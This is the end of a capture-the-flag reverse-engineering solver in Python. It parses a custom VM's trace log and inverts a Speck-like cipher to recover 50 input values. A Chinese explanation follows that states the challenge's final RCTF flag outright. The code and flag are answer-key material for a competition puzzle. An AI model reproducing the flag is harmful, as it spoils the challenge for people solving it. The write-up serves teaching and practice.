    return (low ^ high) & mask32


def func_B_32bit(r0, r1):
    """Return (r0 + r1) mod 2**32, computed with an XOR/AND carry loop."""
    addend = r1
    while True:
        carry = (r0 & addend) & mask32
        r0 = (r0 ^ addend) & mask32
        if carry == 0:
            break
        addend = (carry << 1) & mask32
    return r0 & mask32


def func_C_32bit(r0, r2):
    """Return r0 XOR r2, masked to 32 bits."""
    return (r0 ^ r2) & mask32


def func_D_32bit(r_in):
    """Combine ``r_in << 3`` and ``r_in >> 29`` (each masked to 32 bits) by XOR.

    For a 32-bit input this is a rotate-left by 3.
    """
    high = (r_in << 3) & mask32
    low = (r_in >> 29) & mask32
    return (high ^ low) & mask32


def func_E_32bit(r0, r1):
    """Return r1 XOR r0, masked to 32 bits."""
    return (r1 ^ r0) & mask32


def build_r2_schedule(r):
    """Run only the "lower half-round" over r2, r3, r4, r5.

    Args:
        r: sequence whose first four items seed r2, r3, r4 and r5.

    Returns:
        A list of 27 values: the r2 constant used by the upper half-round of
        each round, in round order.
    """
    r2, r3, r4, r5 = r[0], r[1], r[2], r[3]
    R2 = []
    for k in range(27):
        R2.append(r2)
        if k == 0x1A:
            # The last constant is already recorded; no further update needed.
            continue
        # Same A -> B -> C / D -> E pipeline as the data round, with the
        # round counter k taking the place of the round constant.
        mixed = func_C_32bit(func_B_32bit(func_A_32bit(r3), r2), k)
        next_r2 = func_E_32bit(mixed, func_D_32bit(r2))
        r2, r3, r4, r5 = next_r2, r4, r5, mixed
    return R2


def rol32(x, n):
    """Rotate the 32-bit value x left by n bits."""
    return ((x << n) | (x >> (32 - n))) & mask32


def ror32(x, n):
    """Rotate the 32-bit value x right by n bits."""
    return ((x >> n) | (x << (32 - n))) & mask32


def inv_upper_round(r0_next, r1_next, r2_k):
    """Invert one upper half-round.

    Given the round outputs (r0_next, r1_next) and the round constant r2_k,
    return the inputs (r0_prev, r1_prev) of that round.
    """
    c0 = r0_next & mask32
    e1 = r1_next & mask32
    # Undo E (xor with c0) and then D (rotate-left 3) to recover r1.
    r1_prev = ror32((e1 ^ c0) & mask32, 3)
    # Undo C (xor r2_k), B (add r1) and A (rotate-right 8) to recover r0.
    b0 = (c0 ^ r2_k) & mask32
    a0 = (b0 - r1_prev) & mask32
    r0_prev = rol32(a0, 8)
    return r0_prev, r1_prev


# Working set of the 50 input values; main() overwrites entries in place as
# each check is solved.
ints = [
    13430028123848624410, 13767982679358783948, 11713643540287541804,
    8785781270016547275, 5592440162506734093, 18308193844343275176,
    1734829927, 12474808138286712448, 14773488025708418042,
    6145507630794926191, 1802201963, 15600888960577064236,
    6903078875579093773, 1852730990, 13105847985596755079,
    12401591929655495169, 14481374110727130427, 3919366872831373201,
    11451939409513851430, 1953789044, 17235855896972825888,
    1987475062, 1916851354365983645, 2021161080,
    2038004089, 2054847098, 17641256427711907975,
    13917286480390178951, 9086595392298378073, 5295387722887053174,
    15356410353063384153, 12187465423418120720, 14608926774405230659,
    16160493834789769285, 1229539657, 13841060151611699047,
    1263225675, 1280068684, 10181670230088315432,
    1313754702, 1330597711, 5725376311369793868,
    12817717089813452135, 11273537721551939182, 3076809482903728308,
    1414812756, 1431655765, 6802938463641799296,
    11625777768394830813, 1482184792,
]


def _scan_log(lines):
    """Extract the constants of the traced check from the VM log lines.

    Returns:
        ``(input_value, cipher, ops)``. ``ops`` is a list of
        ``[line_index, value, tag]`` entries with tag "k", "c" or "r".
        ``cipher`` is the value compared against R0, or ``None`` when the log
        holds no "CMP R0 == " line (or ends in the middle of a record).
    """
    ops = []
    input_value = 0
    watch_r7_cmp = True
    total = len(lines)
    i = 0
    while i < total:
        if i < 10 and "RETVAL R7 = 0x00000000000000ff stored at dp=0xffef" in lines[i]:
            # The line after this marker carries the first additive constant.
            i += 1
            if i >= total:
                break
            k = int(lines[i].split("LDI R6 = ")[1].split(",")[0], 16)
            ops.append([i, k, "k"])
        if "XOR R0 ^= imm64" in lines[i]:
            c = int(lines[i].split("XOR R0 ^= imm64 ")[1].split(":")[0], 16)
            ops.append([i, c, "c"])
        line = lines[i]
        if (
            "CMP R7 == 0x0000000000000000? R7=0x0000000000000000, ZF=True" in line
            and watch_r7_cmp
        ):
            i += 1
            # Collect everything up to the next AND; bounded so a truncated
            # log cannot run the index off the end.
            while i < total and "AND R7 &= R6:" not in lines[i]:
                if "XOR R0 ^= imm64" in lines[i]:
                    c = int(lines[i].split("XOR R0 ^= imm64 ")[1].split(":")[0], 16)
                    ops.append([i, c, "c"])
                if "LDI R1 = " in lines[i]:
                    r = int(lines[i].split("LDI R1 = ")[1].split(",")[0], 16)
                    # Low and high 32-bit halves of the 64-bit immediate.
                    ops.append([i, r & mask32, "r"])
                    ops.append([i, (r >> 32) & mask32, "r"])
                i += 1
            if i >= total:
                break
            line = lines[i]
            k = int(line.split(" & ")[1].split(" ")[0], 16)
            if k == 0xFFFFFFFFFFFFFFF0:
                # After this operand the R7 compare is no longer tracked.
                watch_r7_cmp = False
            elif k != 1:
                ops.append([i, k, "k"])
        if " => " in line:
            input_value = int(line.split(" => ")[1], 16)
            print(hex(input_value))
        if "CMP R0 == " in line:
            cipher = int(line.split("CMP R0 == ")[1].split("?")[0], 16)
            return input_value, cipher, ops
        i += 1
    return input_value, None, ops


def _recover_input(cipher, ops):
    """Invert one check: undo the 27 rounds, then the k/c pre-processing."""
    # The last four collected values seed the round-constant schedule.
    key_words = [entry[1] for entry in ops[-4:]]
    schedule = build_r2_schedule(key_words)
    r0 = cipher & mask32
    r1 = (cipher >> 32) & mask32
    for r2_k in reversed(schedule):
        r0, r1 = inv_upper_round(r0, r1, r2_k)
    x = (((r1 & mask32) << 32) | (r0 & mask32)) & mask64
    # Undo the remaining operations last-to-first: "k" entries are
    # subtracted, "c" entries are XORed.
    for _, value, tag in reversed(ops[:-4]):
        if tag == "k":
            x = (x - value) & mask64
        elif tag == "c":
            x ^= value
    return x


def main():
    """Solve checks 35..50 one at a time, patching ``ints`` after each.

    Each pass runs the VM with ``debug_after_n=kkk``, reads back ``vm.log``,
    recovers the input that satisfies the traced compare and stores it in
    ``ints``.

    Raises:
        RuntimeError: if ``vm.log`` contains no "CMP R0 == " line. The
            original loop would otherwise re-run the VM forever without
            advancing.
    """
    for kkk in range(35, 51):
        run_vm_with_ints(ints, vmcode_path="full_vmcode", debug=False, debug_after_n=kkk)
        with open("vm.log", "r", encoding="utf-8") as f:
            lines = f.readlines()
        input_value, cipher, result = _scan_log(lines)
        if cipher is None:
            raise RuntimeError(f"check {kkk}: no 'CMP R0 == ' line found in vm.log")
        print(hex(cipher))
        print(result)
        x = _recover_input(cipher, result)
        idx = ints.index(input_value)
        ints[idx] = x
        print(kkk, ints)


if __name__ == "__main__":
    main()
其中 kkk 表示当前处理的是第几个 check。具体逻辑是:每次启动 VM,借助 debug_after_n 打印最后一轮 check 的日志(从读取数据开始到 cmp 为止),并写入 vm.log;VM 在出错的 check 的下一轮就会返回 0,导致 VM 退出。随后脚本开始读取 vm.log,通过字符串匹配找到 c、k、r 等常量,同时提取出输入数值和 cmp 数值;一旦找到 cmp 数值就开始解密。由于每个 check 的代码都一样,只需根据 c、k 出现的顺序修改 x 的计算即可。最后用得到的新值替换掉 ints 里对应的输入数值,并打印新的 ints。
整个脚本估计 30 分钟左右可以跑完,并打印出最终的 50 个数;将这 50 个数输入程序,即可获取 flag:RCTF{VM_ALU_SMC_RC4_SPECK!_593eb6079d2da6c187ed462b033fee34}